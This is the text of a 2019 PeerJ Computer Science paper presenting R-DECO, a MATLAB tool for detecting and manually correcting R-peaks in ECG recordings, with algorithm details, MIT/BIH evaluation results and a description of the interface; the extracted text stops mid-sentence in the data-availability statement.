PeerJ Comput. Sci. 5:e226 DOI 10.7717/peerj-cs.226 Submitted 13 May 2019 Accepted 11 September 2019 Published 21 October 2019 Corresponding author Jonathan Moeyersons, Jonathan.Moeyersons@esat. kuleuven.be Academic editor Eibe Frank Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.226 Copyright 2019 Moeyersons et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.226 mailto:Jonathan.�Moeyersons@�esat.�kuleuven.�be mailto:Jonathan.�Moeyersons@�esat.�kuleuven.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.226 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Four decades of automated QRS detection research has resulted in a variety of methods using different approaches. These methods can be stratified based on derivatives, digital filters, wavelet-transforms, classifiers, etc. (Pan & Tompkins, 1985; Dohare, Kumar & Kumar, 2014; Fujii et al., 2013; Sharma & Sunkaria, 2016; Chen, Chen & Chan, 2006). Despite the wide methodological variety, most of these QRS detectors have the same algorithmic structure. This can be divided in two steps: pre-processing and decision making (Kohler, Hennig & Orglmeister, 2002). In the pre-processing step the QRS-complex is highlighted and the other signal components are suppressed to facilitate the detection. The resulting signal is then used to detect the occurrence of QRS-complexes in the decision making step. This is done by using either fixed or adaptive thresholds. Despite high detection rates, some QRS-complexes remain undetected. Reasons for this might be small amplitudes, wide complexes or contamination by noise (Arzeno, Deng & Poon, 2008). Therefore, in many algorithms an extra post-processing step is added for the exact determination of the temporal location of the detected QRS-complex. One of the most established QRS detection algorithms is the Pan–Tompkins algorithm (Pan & Tompkins, 1985). Although it was developed in the eighties, it achieves comparable performance to many more elaborate algorithms (Elgendi et al., 2014). In this paper, an envelope-based procedure that enhances the QRS-complexes and flattens the rest of the ECG is used in combination with an adapted version of the threshold-based approach of the Pan–Tompkins algorithm. This method, which was proposed by our group in Varon et al. (2015), combines the simplicity of an envelope-based procedure, while maintaining the accuracy of many more elaborate methods. Figure 1 A normal heartbeat as recorded by an ECG. The QRS-complex can be observed in the center. The detection of this complex is crucial for almost all ECG analysis algorithms. Full-size DOI: 10.7717/peerj-cs.226/fig-1 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 2/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-1 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ In a review paper, Elgendi et al. (2014) have compared the results of 22 beat detection algorithms on the MIT-BIH arrhythmia database. When comparing the results of the automated algorithms with expert annotations, they have shown that many algorithms obtained excellent accuracy. However, none of the algorithms reached perfection. This means that, no matter how good the QRS detection algorithm is, it is highly likely that not all annotations are correct. Therefore, it is recommended to visually inspect and review each signal before further analysis (Pichot et al., 2016). Many of the existing ECG toolboxes have focussed on the derivation of HRV-analysis parameters from RR-intervals, the time between subsequent R-peaks. This makes sense, since most of the available hardware include some kind of QRS-complex detection algorithm. However, this does not necessarily mean that the output of these devices are the raw RR-intervals. Many of these devices have a built-in post-processing algorithm, which compensates for false detections by averaging over a certain range of RR-intervals (Niskanen et al., 2004; Pichot et al., 2016; Vicente et al., 2013). However, for some analyses, such as ECG derived respiration (EDR) or beat-to-beat variability of repolarization (BVR), it is of utmost importance that the actual R-peak of the QRS-complex is detected. Therefore, it is necessary to visualize the actual R-peak positions in the ECG signal and allow the possibility to make manual adaptations. In this paper, we present R-DECO, a MATLAB-based, graphical user interface (GUI) for the detection and correction of R-peaks. This user interface includes the developed R-peak detection algorithm and provides the user with the possibility to correct possible false detections in a very straightforward way. R-DECO was developed by the biomedical data processing research team (BIOMED) at the Department of Electrical Engineering (ESAT) of KU Leuven. The software is freely available for Windows operating systems at https://gitlab.esat.kuleuven.be/biomed-public/r-deco. The objective of this paper is to provide a detailed description of R-DECO, including the proposed R-peak detection algorithm and an overview of the different possibilities of this new software. COMPUTATIONAL METHODS R-peak detection We developed an R-peak detection algorithm that is based on an enveloping procedure. It achieves a 99.60% sensitivity and 99.69% positive predictive value (PPV) on the MIT/BIH Arrhythmia Database (Moody & Mark, 2001). The algorithm can be divided in three steps: pre-processing, decision and post-processing. Pre-processing The pre-processing consists of an enveloping procedure, which enhances the QRS-complexes and flattens the rest of the ECG (Varon et al., 2015). A visual explanation of the method is shown in Fig. 2. First, the upper (U) and lower (L) envelopes are computed from the ECG signal by the secant method. This method selects the segment with the steepest positive and negative slope in a user-defined window with length t. Once U and L are obtained, they are used to Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 3/20 https://gitlab.esat.kuleuven.be/biomed-public/r-deco http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ derive a flattened version of the ECG signal (F): F = U - L. Since L is subtracted from U, the baseline is eliminated and only a positive signal, F, remains. Decision The locations of the QRS-complexes are found by detecting the peaks in the flattened ECG. These peaks are detected in three stages. First, all samples with an amplitude lower than the amplitude of the sample 80 ms further are selected. The 80 ms step size was experimentally defined. This results in the selection of the upward slopes. As a second step, only the upward slopes that are longer than the step size are selected in order to exclude small peaks. Finally, the maximum is selected in a window, with a length equal to the step size, that starts from the last selected sample of the upward slope. A graphical representation of this process is shown in Fig. 3. On this selection of peaks, the adaptive thresholding procedure of the Pan–Tompkins algorithm is applied to define the peaks that correspond to the QRS-complexes. Post-processing The thresholding procedure generally produces satisfactory results for the detection of the QRS-complexes. However, some of the automatically generated RR-intervals might be physiologically unreasonable and need to be removed for further analysis. A slightly modified version of the search-back procedure as proposed in De Chazal et al. (2003) was used for this purpose. Once the positions of the QRS-complexes are identified, the original ECG is used to find the exact location of the R-peaks. The search for an R-peak is performed up to 50 ms from the peak in the flattened signal. This extra search is necessary because the presence of large S-waves might shift the peak in the flattened signal toward the valley of the S-wave. Figure 2 Enveloping procedure. The flattened ECG (F) is constructed by subtracting the lower envelope (L) from the upper envelope (U). This enhances the QRS-complex and flattens the rest of the ECG signal. Full-size DOI: 10.7717/peerj-cs.226/fig-2 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 4/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-2 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ Evaluation on the physionet MIT/BIH arrhythmia database We used the MIT/BIH arrhythmia database to evaluate the proposed algorithm (Moody & Mark, 2001). This dataset consists of 48 half-hour ECG signals, which were recorded in the Boston’s Beth Israel Hospital between 1975 and 1979. All recordings were annotated by two independent cardiologists who also made a distinction between normal and abnormal beats. In total, 110,122 heartbeats were annotated, of which 89,133 were labeled as normal. Each recording contains two channel ECG signals with a sampling frequency of 360 Hz. In most records, one channel is lead II and the other channel is V1. However, we only used the first channel for the evaluation. As mentioned previously, the pre-processing consists of a flattening step of the ECG with a user-defined window width. To evaluate the sensitivity of the performance to the choice of the width we have tested multiple window widths. As can be observed from Fig. 4, comparable results were obtained for window widths between 250 and 350 ms. In Table 1 we list the R-peak detection results of the proposed algorithm with an envelope width of 300 ms and without post-processing. We obtained an overall sensitivity of 99.60% and PPV of 99.69%. When including the post-processing, we obtained an overall sensitivity of 99.09% and PPV of 99.80%. These results are comparable with those in literature, especially with the Pan–Tompkins algorithm, which reaches a sensitivity of 99.76% and a PPV of 99.56% (Elgendi et al., 2014). While these results are very promising, we can also observe that for some recordings only moderate detection results are achieved. This decrease in performance is generally due to loss of signal, unusual morphology or stretches of extremely irregular rhythms. For instance, recording 116 and 208 contain stretches where the signal is lost in the first channel. However, the recordings with the highest amount of false detections are 108, 203 Figure 3 Procedure to select R-peaks. The resulting flat ECG denoted F is indicated by the black line. The samples with an amplitude lower than the sample 80 ms further are indicated by the magenta circles, with the last sample indicated by the green circle. The search window is indicated by the green line. The selected R-peaks are indicated by the black circles. A.u. stands for arbitrary units. Full-size DOI: 10.7717/peerj-cs.226/fig-3 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 5/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-3 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ and 210. Correctly detecting the R-peaks in recording 108 has been proven difficult for many algorithms (Pan & Tompkins, 1985). It contains a lot of baseline wander and additionally, very tall and sharp P-waves. These characteristics make it difficult to distinguish P-waves from R-peaks and thus result in a high false positive count. However, the highest amount of false positives is observed in recording 203 (92.25% sensitivity). This might be explained by the extremely high percentage of premature ventricular contractions (PVC) present in the recording, almost 15%. Since the envelope width was fixed during the detection process, one may assume that the performance could be improved if manual adjustments were permitted. This holds as well for other records with PVC’s, such as record 210. The noise tolerance of the algorithm was evaluated with the MIT-BIH Noise Stress Test Database (Moody, Muldrow & Mark, 1984). We observed that both median PPV and sensitivity remained around 100% above a signal-to-noise-ratio of six dB. From this threshold the performance of the algorithm decreased significantly. From the analysis of the results, we could deduce two main factors that influence the results of the algorithm: (1) the envelope width and (2) the RR-post processing. The number of samples in the envelope is important, since it can be regarded as a filter of the RR-intervals. Smaller envelope widths might result in the enhancement of more peaks than only the R-peaks. This might be beneficial in the case of small R-peaks, but might also enhance artefact peaks. Larger envelope widths might cause adjacent R-peaks to be merged in the flattened signal. In practice, this might result in the failure of detecting premature heartbeats, which appear shortly after the previous heartbeat. In summary, Figure 4 Performance of the algorithm, compared to the choice of window width. (A) The positive predictive value and (B) the sensitivity of the algorithm. A window width between 250 and 350 ms results in the best performance. Full-size DOI: 10.7717/peerj-cs.226/fig-4 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 6/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-4 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ Table 1 Performance of the R-peak detection algorithm on the Physionet MIT/BIH dataset. Record Total (beats) TP (beats) FP (beats) FN (beats) Se (%) PPV (%) 100 2,273 2,273 0 0 100 100 101 1,865 1,864 4 1 99.95 99.79 102 2,187 2,187 0 0 100 100 103 2,084 2,084 0 0 100 100 104 2,229 2,227 3 2 99.91 99.87 105 2,572 2,542 41 30 98.83 98.41 106 2,027 2,023 2 4 99.80 99.90 107 2,137 2,130 0 7 99.67 100 108 1,763 1,739 80 24 98.64 95.60 109 2,532 2,532 0 0 100 100 111 2,124 2,123 2 1 99.95 99.91 112 2,539 2,539 0 0 100 100 113 1,795 1,795 0 0 100 100 114 1,879 1,877 6 2 99.89 99.68 115 1,953 1,953 0 0 100 100 116 2,412 2,388 2 24 99 99.92 117 1,535 1,535 0 0 100 100 118 2,278 2,278 1 0 100 99.96 119 1,987 1,987 2 0 100 99.90 121 1,863 1,861 12 2 99.89 99.36 122 2,476 2,476 0 0 100 100 123 1,518 1,518 0 0 100 100 124 1,619 1,619 0 0 100 100 200 2,601 2,595 8 6 99.77 99.69 201 1,963 1,958 0 5 99.75 100 202 2,136 2,120 14 16 99.25 99.34 203 2,980 2,749 20 231 92.25 99.28 205 2,656 2,641 2 15 99.44 99.92 207 1,860 1,855 8 5 99.73 99.58 208 2,955 2,941 2 14 99.53 99.93 209 3,005 3,005 0 0 100 100 210 2,650 2,582 3 68 97.43 99.88 212 2,748 2,748 1 0 100 99.96 213 3,251 3,250 0 1 99.97 100 214 2,262 2,259 3 3 99.87 99.87 215 3,363 3,354 0 9 99.73 100 217 2,208 2,202 0 6 99.73 100 219 2,154 2,154 1 0 100 99.95 220 2,048 2,047 0 1 99.95 100 221 2,427 2,425 2 2 99.92 99.92 222 2,483 2,475 21 8 99.68 99.16 223 2,605 2,605 0 0 100 100 (Continued) Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 7/20 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ a larger envelope width results in less false positives and more false negatives and the opposite is true for a small envelope width. A similar effect can be observed when the RR-intervals are post-processed. This increases the certainty of detection of the algorithm and thus results in less false positives. The downside is that, in the presence of abnormal rhythms, it also results in more false negatives. SOFTWARE DESCRIPTION The algorithms have been implemented with MATLAB R2018a. We used GUIDE, MATLAB’s GUI development environment, to design the GUI of R-DECO. The current subsection describes the possible input data formats and the user interface. Input data formats The standard input of the toolbox is raw or filtered ECG data. This can be both single- or multichannel ECG. Since a plethora of open formats exist for storing the ECG, it would be impossible to write supporting software for all formats (Niskanen et al., 2004). Therefore, we focussed on the data formats that are most commonly used by our clinical partners in the cardiology department of the UZ Leuven, Belgium. The following file formats are supported: � ISHNE-Holter files (�.ecg) � MATLAB files (�.mat) � European Data Format (�.edf) � Text files (�.txt) � Excel files (�.xls or �.csv) An ISHNE-Holter file is organized in a header record, followed by a data block that contains all digital ECG samples. This file format was developed to facilitate data exchange and research in the field of Holter (Badilini, 1998). The software automatically extracts all ECG channels and also the sampling frequency. A MATLAB formatted file can contain one variable, up to an entire workspace. Therefore, if the file contains more than one variable, the user is prompted to select the variable containing the ECG signal. In the specific case that the selected file is a structure, the software allows to search within the structure until the ECG signal is selected. Table 1 (continued). Record Total (beats) TP (beats) FP (beats) FN (beats) Se (%) PPV (%) 228 2,053 2,044 59 9 99.56 97.19 230 2,256 2,256 0 0 100 100 231 1,571 1,571 0 0 100 100 232 1,780 1,780 17 0 100 99.05 233 3,079 3,070 0 9 99.71 100 234 2,753 2,753 1 0 100 99.96 Total 109,494 108,989 317 505 99.60 99.69 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 8/20 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ A standard European Data Format, EDF, file consists of a header record and the data records (Kemp et al., 1992). It was originally intended for the digital storage and exchange of EEG and polysomnogram recordings, but currently it can store a variety of annotations and signals, such as EMG, ECG and many more (Kemp & Olivan, 2003). Since not all EDF files have the same standard labels, the user is prompted to identify the ECG channel(s). Additionally, the software attempts to identify the sampling frequency of the selected signal by scanning the file. As an extra feature, the software allows the user to load a session. When the current session is interrupted, the session can be saved as a MATLAB file. It includes all the analysis parameters, the ECG signal and the RR-intervals, if computed. When a previous session is loaded, the software restores the entire user interface to the moment on which the session was saved. This allows the user to pause and continue, whenever wanted. User interface The strength of this toolbox is that everything is operated through a single GUI. As shown in Fig. 5, it can be divided in five segments: Data, Filter, Analysis Period, R-peak Detection and R-peak Correction. All segments are described below. Data In the data panel, the user has the option to load data in two different ways: from a file or from the MATLAB workspace. Both can be accessed via the respective pushbuttons. Figure 5 The graphical user interface of R-DECO. The user interface can be divided in five segments: (A) Data, (B) Filter, (C) Analysis Period, (D) R-peak Detection and (E) R-peak Correction. The ECG signal and the resulting tachogram are shown in respectively (F) and (G). The detected R-peaks are depicted as small blue circles. Full-size DOI: 10.7717/peerj-cs.226/fig-5 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 9/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-5 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ When a file is selected, the software visualizes a small segment of the ECG signal. If the signal is inverted, the user can indicate this and the file will be inverted before further analysis. The software also scans the selected file for the sampling frequency. If this is not found, the software prompts the user to manually indicate the sampling frequency. Finally, the data panel also contains a reset button. This button allows the user to reset the entire GUI. It empties all plots, restores all default variables and deletes all results. If the user has not yet saved the current analysis, the user is prompted to confirm the reset action to prevent unwanted loss of information. Filter Since ECG signals can be contaminated with noise, filtering is often essential for further analysis. R-DECO provides three basic filters: high pass, low pass and a notch filter. The high pass filter consists of a zero phase, second order Butterworth filter. The low pass filter consists of a zero phase, fourth order Butterworth filter. Finally, a zero phase notch filter is also included. The latter could be used to remove the power-line interference. Important to note is that filtering actions are always executed on the original signal to ensure repeatability. In order to aid the user in the selection of appropriate frequency threshold(s), R-DECO is able to compute and display the power spectrum. An estimate of the power spectrum is computed using the Welch method (Welch, 1967). As a default, we used a window of 500 samples with 60% overlap. To visualize the effect of the filtering in the frequency domain, R-DECO displays both the filtered and the original power spectrum. Furthermore, the effect of the filtering in the time domain can also be investigated by checking the “Show Original” checkbox. This will overlay the original signal on top of the filtered signal (Fig. 6). Analysis period In the Analysis Period panel the user has the possibility to define an analysis window. After pushing the “Define analysis period” button, the user has to select a window by clicking, dragging and releasing the mouse. The window is shown as a transparent patch over the data and can be enlarged, shrinked or moved with the mouse. After the initial window Figure 6 Example of a high pass filter. By clicking the “Show Original” checkbox, the original signal (light blue) is overlaid on the filtered signal (blue). Full-size DOI: 10.7717/peerj-cs.226/fig-6 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 10/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-6 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ is drawn, the user can further modify the analysis window by changing the start time and/or the duration of the window. When a window is selected, the user can accept the analysis window by pressing the “Apply changes” button. This prompts the x-limits of the graph to match the analysis window and disables the window modifications. From here on, all further analysis will be performed solely on the selected window. All the above is very useful when the to-be-selected time period is known in advance, but this is not always the case. Sometimes the selection of the analysis window is depending on certain patterns in the tachogram, hence the tachogram has to be constructed first. Therefore, if R-peaks have been detected already, the user is prompted to indicate whether he/she would like to keep the detected R-peaks. R-peak detection The execution of the R-peak detection algorithm, as described in the first section, is initiated when the “Detect Peaks” button is pushed. However, before the actual algorithm is executed, the user is able to adjust the default parameters of the algorithm. In Fig. 7, an epoch of 10 s of the ECG signal and its respective enveloped signal is shown as an example of the flattening procedure. The user can adjust the envelope size to the desired value and enact the changes by pressing the “Apply” button. Additionally, an estimation of the average heart rate can be defined to compute the boundaries of normal-to-normal RR-intervals. Lastly, the user can select the automatic post-processing of the RR-intervals. Since some devices have built-in QRS detection algorithms and some researchers have their own preferred QRS detection algorithm, the software allows to load R-peak locations. These will be displayed the same way the R-peaks of the algorithm are displayed. R-peak correction In case of HRV studies, only the normal-to-normal RR-intervals need to be taken into account. This can be achieved by selecting the ectopic removal option. This option corrects ectopic beats, without altering the normal RR-intervals. Figure 7 The R-peak parameter selection window. The user can adjust the envelope size, the average heart rate and indicate if RR post-processing is necessary. Pressing the Default button restores the default values. Full-size DOI: 10.7717/peerj-cs.226/fig-7 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 11/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-7 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ After finishing the detection process, either by detecting or loading the R-peaks, it is still possible that not all R-peaks are accurately detected. In R-DECO, the user can make manual and (semi-)automatic adjustments to the R-peak locations. The manual methods are: add, adjust and delete. These methods can be activated by selecting the specific radiobuttons or via a context menu, which is linked to each R-peak. These manual methods allow the user to correct wrong or missing annotations either in all or in individual leads. � Add: When this radiobutton is active, new R-peaks can be added by clicking in the ECG graph. The program selects the signal sample that is closest to the mouse position in a symmetric window of 300 ms around the mouse position. Upon mouse release, a new R-peak is added and the tachogram is adapted. � Adjust: While hovering over the ECG graph, the R-peak closest to the mouse location is selected. After clicking on the desired R-peak, it can be moved by dragging the mouse. The movement of the selected R-peak is restricted by the previous and next R-peak. While adjusting the R-peak location, the tachogram is automatically updated. Upon mouse release, the new R-peak location is saved. � Delete: While hovering over the ECG graph, the R-peak closest to the mouse location is selected. After clicking on the desired R-peak, more to-be-deleted R-peaks can be selected by dragging the mouse. Upon mouse release, the selected R-peaks are removed and the tachogram is adapted. The three (semi-)automatic R-peak correction methods are: cross-correlation, peak conversion and maximum search. � Cross correlation: For this method, a symmetrical window of 300 ms around each R-peak is selected. Then, all heartbeats are normalized by subtracting the mean and dividing it by the standard deviation. Then, a trimmed average QRS-complex is computed of all the positive and “negative” R-peaks. In this work a “negative” R-peak is understood as the absence of an R-peak or the presence of a very prominent S-wave, also described as RS-complex. � The user is prompted to select either the positive or the “negative” average heartbeat. If necessary, the user can also adjust the location of the R-peak on the selected template. This is all graphically displayed as shown in Fig. 8. Finally, the cross-correlation of every heartbeat is computed with the trimmed average and the R-peak is re-located, based on the highest correlation value. � Peak conversion: The absolute amplitude of every R-peak annotation is compared with the previous and next sample’s absolute amplitude. If it is bigger than the previous and smaller than the next, the location of the R-peak will be shifted forward, until an extremum is obtained. If it is the other way around, the location of the R-peak will be shifted backwards. � This functionality avoids the “jumping” of R-peaks from, for example, an actual R-peak to a pre-mature ventricular contraction, which might be the case when window search is Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 12/20 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ applied. Furthermore, pressing the button more than once will not affect the relocation after one correction. � Maximum search: Firstly, a symmetric window of 300 ms around each R-peak is selected. Secondly, the user is prompted to select either the maximum, minimum or absolute maximum. Based on this selection, the respective extremum within the window is selected as new R-peak location. Save and export results By default, the results are saved as a MATLAB file. This file includes the R-peak locations and the RR-intervals, which can further be used for HRV-, BVR- or any other analysis that requires R-peak detection. Additionally, the software can export the results in two different ways: (1) an Excel file and (2) a MATLAB file. (1) Excel file (�.xls): A new workbook is created with a general overview of the file on the first sheet: the number of channels, the sampling frequency, the duration of the signal and the duration of the analysis period. The number of additional sheets is defined by the number of channels, since for every channel, a separate sheet is created. This contains the R-peak locations, the RR-intervals and a number of basic metrics, such as the mean heart rate. (2) MATLAB file (�.mat): This file contains a single structure named data. In accordance to the structure of the Excel file, a structure is created per channel. This contains the signal in the analysis window, the R-peak locations and the RR-intervals. This option is especially useful for further analysis in MATLAB. Data browser In order to graphically correct the R-peaks it is important to have a clear view of the segment to be investigated. Therefore, after the R-peaks are detected, the software immediately displays the ECG signal with the R-peak annotations and the respective tachogram, as can be seen in Fig. 9. The window width of the x-axis can be adjusted in three different ways: (1) the range edit box, (2) the plus and minus buttons or (3) by using the zoom button. All three methods also adjust the width of the scroll bar. The scroll bar can be used to slide through the signal. Since both axes are linked, both slide at the same time. The limits of the y-axis in both axes are adjusted automatically according to the data within the selected range. However, if the “Fix y-limits” checkbox is selected, the range of the y-axis of the tachogram is fixed to the current limits. Since some users favor a tachogram that displays the RR-intervals, while others favor HR values, we made it possible to switch between the two. An ECG recording with multiple channels might result in axes that become unclear. Therefore, R-DECO enables the user to switch view between different channels. This way the user can select one, multiple or all channels. If the channel labels are not present in the signal file, R-DECO names and numbers the channels itself: Channel 1, Channel 2, etc. Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 13/20 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ However, it also provides the possibility to change these names. When the user clicks twice on a channel name in the listbox, a dialog box pops up that allows the user to choose a new name. This will be adjusted in the listbox, and also in the output files. Figure 9 The data browsing options of R-DECO. Full-size DOI: 10.7717/peerj-cs.226/fig-9 Figure 8 The template selection window. The user can select either the positive or “negative” R-peak template and can shift the location of the R-peak if necessary. Full-size DOI: 10.7717/peerj-cs.226/fig-8 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 14/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-9 http://dx.doi.org/10.7717/peerj-cs.226/fig-8 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ An extra feature is the possibility to take “pictures” of the axes. This saves both axes in a format of choice, without including any of the buttons or bars from the user interface. In order to design the axes to the user’s taste, R-DECO allows to change the line colors and the grid lines. Preferences The analysis settings of R-DECO can be adjusted via the Preferences menu. Note that the changes only apply for the current session and are not saved for the next session. This will be adjusted in a future release. The Preference menu can be divided in four segments: Power Spectrum, Filter, Detection and Correction � Power Spectrum: All variables of the Welch method can be adjusted here. � Filter: The type and order of the filter can be defined here. � Detection: The default input parameters for the R-peak detection algorithm can be adjusted here. Whenever the default button is pressed in the parameter selection window, see Fig. 7, all parameters are reset to the values defined in this segment. � Correction: For all correction methods, the user can define the window size in which the new R-peak is supposed to be located. SAMPLE RUN As a sample run, we used a 24 h digital Holter signal that was recorded from a male subject with ischaemic heart disease. The idea was to investigate the temporal evolution in BVR before spontaneous non-sustained ventricular tachycardia (nsVT). Before analysis could be performed, the nsVT episodes needed to be identified and the R-peaks needed to be detected. Once the signal was loaded and the sampling frequency was defined, we first had a look at the power spectrum. According to the plot, no power line interference was present, since we could not observe a peak at 50 or 60 Hz. However, it was clear that most of the power was situated in the lower frequency bands. This could indicate the presence of baseline wander. Therefore, we high-pass filtered the signal with a cut-off frequency of 0.66 Hz. The result in the power spectrum can be observed in Fig. 10. Next, the nsVT episodes needed to be identified. However, the time stamps of the episodes were not known. Therefore, it was necessary to detect the R-peaks first. This way the nsVT episodes could be identified from the tachogram. An example of an nsVT episode, taken with the picture button, can be observed in Fig. 11. Based on the example signal, we selected an envelope size of 300 ms, which provided the best results for this signal. This envelope size ensures the enhancement of the QRS- complexes, without skipping any beats. Additionally, we indicated that no post-processing of the RR-intervals is wanted, since we wanted to be able to detect nsVT segments as well. The nsVT episodes were identified based on the resulting RR-intervals. From the start of one of these episodes, we selected 30 consecutive heartbeats (Thomsen et al., 2004). Only normal-to-normal intervals should be taken into account for BVR-analysis. Hence, Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 15/20 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ (ventricular) ectopic and post-extrasystolic beats were removed for further analysis, as can be observed in Fig. 12. After the RR-intervals in the wanted analysis window were selected, the analysis results were saved. This was done by selecting “Save Results” on the menu bar and entering a file name. The results are then saved as a MATLAB file and can be loaded for the following BVR-analysis. Note that the results can also be exported as an Excel file. Figure 10 Result of the high pass filtering in the power spectrum. Full-size DOI: 10.7717/peerj-cs.226/fig-10 Figure 11 Example of an nsVT segment with correction (A); the resulting tachogram is shown in (B). Full-size DOI: 10.7717/peerj-cs.226/fig-11 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 16/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-10 http://dx.doi.org/10.7717/peerj-cs.226/fig-11 http://dx.doi.org/10.7717/peerj-cs.226 https://peerj.com/computer-science/ POTENTIAL OF FUTURE GROWTH R-DECO is the first step toward a complete ECG processing tool. At the moment, it focusses on accurate R-peak detection and intuitive correction options. Therefore, it is a complementary tool for existing HRV-analysis toolboxes, which tend to focus on the computation of HRV metrics from RR-intervals. Although some toolboxes already provide the possibility to detect R-peaks, their possibility to correct R-peak annotations is rather limited (Pichot et al., 2016; Rodenhauser et al., 2018; Vicente et al., 2013). Additionally, to the best of our knowledge, none of the existing toolboxes provide filtering, R-peak detection and correction all together. The main advantage of R-DECO is the easy-to-use, intuitive GUI. All actions are performed in one window, which simplifies the use and reduces the learning time. Several extra features are being developed and will be released in future versions. We intend to add support for other input file formats, such as hierarchical data format 5 files, general data format files, etc. However, most improvements will be in the number of analysis options. Some of the first extra analysis options will be automatic signal quality detection, EDR and HRV-analysis. CONCLUSION R-DECO is a MATLAB based GUI for detecting and correcting R-peaks in ECG signals. The goal of R-DECO is to provide a complete workflow from the raw signal to the tachogram. It includes an accurate R-peak detection algorithm, the performance of which is comparable to the state-of-the-art, and allows the user to graphically correct wrong or missing detections. Additionally, R-DECO supports a variety of ECG input file formats, Figure 12 Example of an nsVT segment with correction (A); the resulting tachogram is shown in (B). Full-size DOI: 10.7717/peerj-cs.226/fig-12 Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 17/20 http://dx.doi.org/10.7717/peerj-cs.226/fig-12 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.226 which allows the processing of recordings directly from the recording device. This makes it a tool that can be used both by engineers, and clinicians. We included some basic pre-processing options, such as three filters and the possibility to select an analysis window. The analysis results can be exported to the MATLAB workspace or Excel for later analysis. R-DECO is available free of charge and can be downloaded from https://gitlab.esat. kuleuven.be/biomed-public/r-deco. ACKNOWLEDGEMENTS Matthew Amoni is a doctoral fellow of the Research Foundation-Flanders (FWO). Carolina Varon is a postdoctoral fellow of the Research Foundation-Flanders (FWO). Rik Willems is a Senior Clinical Investigator of the Research Foundation-Flanders (FWO). ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Bijzonder Onderzoeksfonds KU Leuven (BOF): C24/15/ 036, C24/18/097; Agentschap Innoveren & Ondernemen (VLAIO): STW 150466 OSA+, O&O HBC 2016 0184 eWatch; Belgian Foreign Affairs-Development Cooperation: VLIR UOS programs (2013-2019); EU: 26077, 766456, 813120, 813483. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Bijzonder Onderzoeksfonds KU Leuven (BOF): C24/15/036, C24/18/097. Agentschap Innoveren & Ondernemen (VLAIO): STW 150466 OSA+, O&O HBC 2016 0184 eWatch. Belgian Foreign Affairs-Development Cooperation: VLIR UOS programs (2013–2019). EU: 26077, 766456, 813120, 813483. Competing Interests The authors declare that they have no competing interests. Author Contributions � Jonathan Moeyersons conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Matthew Amoni conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft, provide inside in the wishes of cardiologists. � Sabine Van Huffel conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 18/20 https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.226 � Rik Willems conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft, provide inside in the wishes of cardiologists. � Carolina Varon conceived and designed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The codes are available at: 